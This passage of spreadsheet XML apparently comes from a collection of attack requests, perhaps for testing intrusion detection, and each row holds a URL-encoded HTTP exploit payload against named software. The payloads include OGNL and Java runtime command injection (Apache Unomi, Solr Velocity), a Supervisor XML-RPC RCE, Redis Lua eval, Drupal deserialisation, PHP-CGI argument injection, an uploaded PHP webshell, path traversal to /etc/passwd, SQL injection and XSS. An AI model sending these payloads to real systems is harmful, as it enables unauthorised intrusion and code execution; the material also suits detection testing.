%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22parameterValues%22%3A%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22propertyName%22%3A%22%28%23runtimeclass%20%3D%20%23this.getClass%28%29.forName%28%5C%22java.lang.Runtime%5C%22%29%29.%28%23getruntimemethod%20%3D%20%23runtimeclass.getDeclaredMethods%28%29.%7B%5E%20%23this.name.equals%28%5C%22getRuntime%5C%22%29%7D%5B0%5D%29.%28%23rtobj%20%3D%20%23getruntimemethod.invoke%28null%2Cnull%29%29.%28%23execmethod%20%3D%20%23runtimeclass.getDeclaredMethods%28%29.%7B%3F%20%23this.name.equals%28%5C%22exec%5C%22%29%7D.%7B%3F%20%23this.getParameters%28%29%5B0%5D.getType%28%29.getName%28%29.equals%28%5C%22java.lang.String%5C%22%29%7D.%7B%3F%20%23this.getParameters%28%29.length%20%3C%202%7D%5B0%5D%29.%28%23execmethod.invoke%28%23rtobj%2C%5C%22%20command%5C%22%29%29%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22comparisonOperator%22%3A%22equals%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22propertyValue%22%3A%22male%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22type%22%3A%22profilePropertyCondition%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%5D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%5D%0A%20%20%20%20%7D%0A%20%20%5D%2C%0A%20%20%22sessionId%22%3A%222333%22%0A%7D%20</v>
      </c>
    </row>
    <row r="76" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A76" s="2" t="s">
        <v>94</v>
      </c>
      <c r="B76" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C76" t="s">
        <v>183</v>
      </c>
      <c r="D76" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2FRPC2%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2117.157%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20213%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0A%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3CmethodCall%3E%0A%3CmethodName%3Esupervisor.supervisord.options.warnings.linecache.os.system%3C%2FmethodName%3E%0A%3Cparams%3E%0A%3Cparam%3E%0A%3Cstring%3Etouch%20%2Ftmp%2Fsuccess%3C%2Fstring%3E%0A%3C%2Fparam%3E%0A%3C%2Fparams%3E%0A%3C%2FmethodCall%3E</v>
      </c>
    </row>
    <row r="77" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A77" s="2" t="s">
        <v>259</v>
      </c>
      <c r="B77" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C77" t="s">
        <v>260</v>
      </c>
      <c r="D77" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fdownload%3Furi%3Dftp%3A%2F%2F192.168.248.132%3A2121%2F%26file%3D%7Ctouch%24%7BIFS%7Dsuccess.txt%20HTTP%2F1.1%0AHost%3A%20192.168.248.133%3A8080%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%3B%20rv%3A91.0%29%20Gecko%2F20100101%20Firefox%2F91.0%0AAccept%3A%20text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Fwebp%2C%2A%2F%2A%3Bq%3D0.8%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0AAccept-Encoding%3A%20gzip%2C%20deflate%0AConnection%3A%20close%0ACookie%3A%20PHPSESSIDCV%3D5Tte00Ga7WVlwh%252BZtuQR5A%253D%253D%3B%20javascript_enabled_detect%3D2%3B%20javascript_enabled%3D1694776959000%3B%20local_tz%3DAsia%252FShanghai%0AUpgrade-Insecure-Requests%3A%201%0A</v>
      </c>
    </row>
    <row r="78" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A78" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B78" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C78" t="s">
        <v>258</v>
      </c>
      <c r="D78" t="str">
        <f t="shared" si="1"/>
        <v>%2A3%0A%244%0Aeval%0A%24185%0Alocal%20io_l%20%3D%20package.loadlib%28%22%2Fusr%2Flib%2Fx86_64-linux-gnu%2Fliblua5.1.so.0%22%2C%20%22luaopen_io%22%29%3B%20local%20io%20%3D%20io_l%28%29%3B%20local%20f%20%3D%20io.popen%28%22id%22%2C%20%22r%22%29%3B%20local%20res%20%3D%20f%3Aread%28%22%2Aa%22%29%3B%20f%3Aclose%28%29%3B%20return%20res%0A%241%0A0</v>
      </c>
    </row>
    <row r="79" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A79" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B79" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C79" t="s">
        <v>184</v>
      </c>
      <c r="D79" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fq%3Fstart%3D2000%2F10%2F21-00%3A00%3A00%26m%3Dsum%3Asys.cpu.nice%26o%26ylabel%26xrange%3D10%3A10%26yrange%3D%5B0%3Asystem%28%2527touch%2520%2Ftmp%2Fsuccess%2527%29%5D%26wxh%3D1516x644%26style%3Dlinespoint%26baba%3Dlala%26grid%3Dt%26json%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2309.372%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="80" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A80" s="2" t="s">
        <v>91</v>
      </c>
      <c r="B80" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C80" t="s">
        <v>185</v>
      </c>
      <c r="D80" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2FcheckValid%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2117.157%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20124%0AAccept-Encoding%3A%20identity%0AAuthorization%3A%20Basic%20YWRtaW46cGFzcw%3D%3D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0Adocument%3Dthis.constructor.constructor%28%22return%20process%22%29%28%29.mainModule.require%28%22child_process%22%29.execSync%28%22touch%20%2Ftmp%2Fsuccess%22%29</v>
      </c>
    </row>
    <row r="81" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A81" s="2" t="s">
        <v>90</v>
      </c>
      <c r="B81" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C81" t="s">
        <v>186</v>
      </c>
      <c r="D81" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fvulnerabilities%2Fsqli_blind%2F%3Fid%3D1%2529%253BIIF%25282067%253D9387%252C1%252C1%252F0%2529%2516%26Submit%3DSubmit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="82" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A82" s="2" t="s">
        <v>89</v>
      </c>
      <c r="B82" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C82" t="s">
        <v>187</v>
      </c>
      <c r="D82" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fcode_exc.php%3Fa%3D%253CScRiPt%2B%253EkhrK%285297%29%253C%2FScRiPt%253E%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2309.372%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="83" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A83" s="2" t="s">
        <v>88</v>
      </c>
      <c r="B83" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C83" t="s">
        <v>188</v>
      </c>
      <c r="D83" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fassets%2Ffile%3A%252F%252F%2Fusr%2Fsrc%2Fblog%2Fapp%2Fassets%2Fimages%2F%25252e%25252e%2F%25252e%25252e%2F%25252e%25252e%2F%25252e%25252e%2F%25252e%25252e%2F%25252e%25252e%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2062.124%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="84" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A84" s="2" t="s">
        <v>87</v>
      </c>
      <c r="B84" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C84" t="s">
        <v>189</v>
      </c>
      <c r="D84" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fdefaultroot%2Fofficeserverservlet%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F40.0.2214.93%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20301%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20multipart%2Fform-data%0A%0ADBSTEP%20V3.0%20%20%20%20%20185%20%20%20%20%20%20%20%20%20%20%20%20%200%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20611%20%20%20%20%20%20%20%20%20%20%20%20%20DBSTEP%3DREJTVEVQ%0AOPTION%3DU0FWRUZJTEU%3D%0ARECORDID%3D%0AfirstFilesize%3DdHJ1ZQ%3D%3D%0AisDoc%3DdHJ1ZQ%3D%3D%0AmoduleType%3DaW5mb3JtYXRpb24%3D%0AFILETYPE%3DLy4uLy4uL3B1YmxpYy9lZGl0L2FhYS5qc3A%3D%0AisViewOld%3DMQ%3D%3D%0A%3C%25%20out.println%28%22bea86d66a5278f9e6fa1112d2e2fcebf%22%29%3B%20%25%3E</v>
      </c>
    </row>
    <row r="85" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A85" s="2" t="s">
        <v>86</v>
      </c>
      <c r="B85" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C85" t="s">
        <v>190</v>
      </c>
      <c r="D85" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fservice%2Frest%2Fbeta%2Frepositories%2Fgo%2Fgroup%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F55.0.2919.83%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20168%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0ANx-Anti-Csrf-Token%3A%200.2923785139192667%0AX-Forwarded-For%3A%20127.0.0.1%0AX-Nexus-Ui%3A%20true%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%20%22name%22%3A%20%22internal%22%2C%20%22online%22%3A%20true%2C%20%22storage%22%3A%20%7B%20%22blobStoreName%22%3A%20%22default%22%2C%20%22strictContentTypeValidation%22%3A%20true%20%7D%2C%20%22group%22%3A%20%7B%20%22memberNames%22%3A%20%5B%22%24%5C%5CA%7B233%2A233%2A233%7D%22%5D%20%7D%7D</v>
      </c>
    </row>
    <row r="86" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A86" s="2" t="s">
        <v>85</v>
      </c>
      <c r="B86" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C86" t="s">
        <v>191</v>
      </c>
      <c r="D86" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fdata%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.2%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%20like%20Gecko%29%20Chrome%2F44.0.2403.155%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="87" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A87" s="2" t="s">
        <v>84</v>
      </c>
      <c r="B87" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C87" t="s">
        <v>192</v>
      </c>
      <c r="D87" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%3Fa%3DAdmin%2FSupervisor%26b%3DSearch%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2224.3%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="88" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A88" s="2" t="s">
        <v>83</v>
      </c>
      <c r="B88" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C88" t="s">
        <v>193</v>
      </c>
      <c r="D88" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%2520HTTP%2F1.1%250d%250aAccept%253a%2520%24s%2F..%2F..%2FsqLServer%2FSeArcH%2FsEarch.AsP%3Fname%3Dao%27%2520or%25201%3D1%2520--%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F70.0.3538.77%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="89" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A89" s="2" t="s">
        <v>82</v>
      </c>
      <c r="B89" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C89" t="s">
        <v>194</v>
      </c>
      <c r="D89" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fgoform%2FSetSysTimeCfg%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2079%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%3B%20charset%3DUTF-8%0AX-Requested-With%3A%20XMLHttpRequest%0A%0AtimePeriod%3D86400%26ntpServer%3D%22time.windows.com%7C%20ls%20%3E%20%2Ftmp%2Ff0und%22%26timeZone%3D20%253A00</v>
      </c>
    </row>
    <row r="90" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A90" s="2" t="s">
        <v>81</v>
      </c>
      <c r="B90" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C90" t="s">
        <v>161</v>
      </c>
      <c r="D90" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fjbossmq-httpil%2FHTTPServerILServlet%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="91" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A91" s="2" t="s">
        <v>80</v>
      </c>
      <c r="B91" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C91" t="s">
        <v>195</v>
      </c>
      <c r="D91" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fadmin%2Fconfig%2Fdevelopment%2Fconfiguration%2Fsingle%2Fimport%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2228.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20538%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0Aconfig_type%3Dsystem.simple%26config_name%3D123%26import%3D%2521php%252Fobject%2B%2522O%253A24%253A%255C%2522GuzzleHttp%255C%255CPsr7%255C%255CFnStream%255C%2522%253A2%253A%257Bs%253A33%253A%255C%2522%255C0GuzzleHttp%255C%255CPsr7%255C%255CFnStream%255C0methods%255C%2522%253Ba%253A1%253A%257Bs%253A5%253A%255C%2522close%255C%2522%253Bs%253A7%253A%255C%2522phpinfo%255C%2522%253B%257Ds%253A9%253A%255C%2522_fn_close%255C%2522%253Bs%253A7%253A%255C%2522phpinfo%255C%2522%253B%257D%2522%26custom_entity_id%3D%26form_build_id%3Dform-CUNhm97pHAW5vtQNyQT1Eb-U9gGwCnTfwjrwKWlcLgo%26form_token%3DVhp4yne9jE35jvajiWI_9PNYcLh2vEe2N543L1s3u-c%26form_id%3Dconfig_single_import_form%26op%3D%25E5%25AF%25BC%25E5%2585%25A5</v>
      </c>
    </row>
    <row r="92" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A92" s="2" t="s">
        <v>79</v>
      </c>
      <c r="B92" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C92" t="s">
        <v>196</v>
      </c>
      <c r="D92" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fsingleuser_action.php%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_4%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F49.0.2656.18%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20574%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%3B%20charset%3DUTF-8%0ASec-Ch-Ua%3A%20%22%20Not%20A%3BBrand%22%3Bv%3D%2299%22%2C%20%22Chromium%22%3Bv%3D%2290%22%0ASec-Ch-Ua-Mobile%3A%20%3F0%0ASec-Fetch-Dest%3A%20empty%0ASec-Fetch-Mode%3A%20cors%0ASec-Fetch-Site%3A%20same-origin%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%20%22syncInfo%22%3A%20%7B%20%22user%22%3A%20%7B%20%22userId%22%3A%20%22001%22%2C%20%22userName%22%3A%20%22001%22%2C%20%22employeeId%22%3A%20%22001%22%2C%20%22departmentId%22%3A%20%22001%22%2C%20%22departmentName%22%3A%20%22001%22%2C%20%22coporationId%22%3A%20%22001%22%2C%20%22corporationName%22%3A%20%22001%22%2C%20%22userSex%22%3A%20%221%22%2C%20%20%22userDuty%22%3A%20%22001%22%2C%20%22userBirthday%22%3A%20%22001%22%2C%20%22userPost%22%3A%20%22001%22%2C%20%22userPostCode%22%3A%20%22001%22%2C%20%22userAlias%22%3A%20%22001%22%2C%20%22userRank%22%3A%20%22001%22%2C%20%22userPhone%22%3A%20%22001%22%2C%20%22userHomeAddress%22%3A%20%22001%22%2C%20%22userMobilePhone%22%3A%20%22001%22%2C%20%22userMailAddress%22%3A%20%22001%22%2C%20%22userMSN%22%3A%20%22001%22%2C%20%22userNt%22%3A%20%22001%22%2C%20%22userCA%22%3A%20%22001%22%2C%20%22userPwd%22%3A%20%22001%22%2C%20%22userClass%22%3A%20%22001%22%2C%20%22parentId%22%3A%20%22001%22%2C%20%22bxlx%22%3A%20%22001%22%20%7D%2C%22operationType%22%3A%20%22ADD_USER%22%20%7D%20%7D</v>
      </c>
    </row>
    <row r="93" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A93" s="2" t="s">
        <v>78</v>
      </c>
      <c r="B93" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C93" t="s">
        <v>197</v>
      </c>
      <c r="D93" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fadmin%2Fsettings%2Fuser%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201091%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20multipart%2Fform-data%3B%20boundary%3D127.0.1.1.0.3979.1407140346.314.1%0A%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22form_name%22%0A%0AuserSettingsForm%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22displayName%22%0A%0Arealname%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22confirmEmail%22%0A%0Aon%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22avatarSize%22%0A%0A90%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22bigAvatarSize%22%0A%0A190%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22avatar%22%0A%0A%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22join_display_photo_upload%22%0A%0Adisplay%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20form-data%3B%20name%3D%22save%22%0A%0ASave%0A--127.0.1.1.0.3979.1407140346.314.1%0AContent-Disposition%3A%20file%3B%20name%3D%22bigAvatar%22%3B%20filename%3D%22thricerbd.php5%22%0AContent-Type%3A%20application%2Foctet-stream%0A%0A%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20echo%20%5C%22%3Cpre%3E%5C%22%3B%20passthru%28%5C%24_GET%5B%5C%27cmd%5C%27%5D%29%3B%20echo%20%5C%22%3C%2Fpre%3E%5C%22%3B%20%3F%3E%22%20%3E%20liwo.php5%27%29%3B%20%3F%3E%0A--127.0.1.1.0.3979.1407140346.314.1--%0A%0A</v>
      </c>
    </row>
    <row r="94" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A94" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B94" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C94" t="s">
        <v>198</v>
      </c>
      <c r="D94" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fcontext.json%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.1%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20476%0AAccept-Encoding%3A%20identity%0A%0A%7B%0A%20%20%20%20%22filters%22%3A%20%5B%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%22id%22%3A%20%222333%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22filters%22%3A%20%5B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22condition%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22parameterValues%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%22%3A%20%22script%3A%3ARuntime%20r%20%3D%20Runtime.getRuntime%28%29%3B%20r.exec%28%5C%22command%20%5C%22%29%3B%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22type%22%3A%20%22profilePropertyCondition%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%5D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%5D%2C%0A%20%20%20%20%22sessionId%22%3A%20%222333%22%0A%7D</v>
      </c>
    </row>
    <row r="95" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A95" s="2" t="s">
        <v>76</v>
      </c>
      <c r="B95" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C95" t="s">
        <v>199</v>
      </c>
      <c r="D95" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2F%3F-%2564%2Ballow_url_include%253d1%2B--define%2Bsafe_mode%253d0%2B-%2564%2Bsuhosin.simulation%253dTRue%2B--define%2Bdisable_functions%253d%2522%2522%2B-d%2Bopen_basedir%253dnone%2B--define%2Bauto_prepend_file%253dphp%3A%2F%2Finput%2B--define%2Bcgi.force_redirect%253doff%2B-d%2Bcgi.redirect_status_env%253d0%2B-n%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F52.0.2762.73%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%206%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0A%3C%3Fphp%20</v>
      </c>
    </row>
    <row r="96" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A96" s="2" t="s">
        <v>53</v>
      </c>
      <c r="B96" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C96" t="s">
        <v>200</v>
      </c>
      <c r="D96" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fsolr%2Ftest%2Fselect%3Fq%3D1%26%26wt%3Dvelocity%26v.template%3Dcustom%26v.template.custom%3D%2523set%28%24x%3D%2527%2527%29%2B%2523set%28%24rt%3D%24x.class.forName%28%2527java.lang.Runtime%2527%29%29%2B%2523set%28%24chr%3D%24x.class.forName%28%2527java.lang.Character%2527%29%29%2B%2523set%28%24str%3D%24x.class.forName%28%2527java.lang.String%2527%29%29%2B%2523set%28%24ex%3D%24rt.getRuntime%28%29.exec%28%2527id%2527%29%29%2B%24ex.waitFor%28%29%2B%2523set%28%24out%3D%24ex.getInputStream%28%29%29%2B%2523foreach%28%24i%2Bin%2B%5B1..%24out.available%28%29%5D%29%24str.valueOf%28%24chr.toChars%28%24out.read%28%29%29%29%2523end%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F40.0.2214.93%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0APragma%3A%20no-cache%0A</v>
      </c>
    </row>
    <row r="97" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A97" s="2" t="s">
        <v>75</v>
      </c>
      <c r="B97" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C97" t="s">
        <v>201</v>
      </c>
      <c r="D97" t="str">
        <f t="shared" si="1"/>
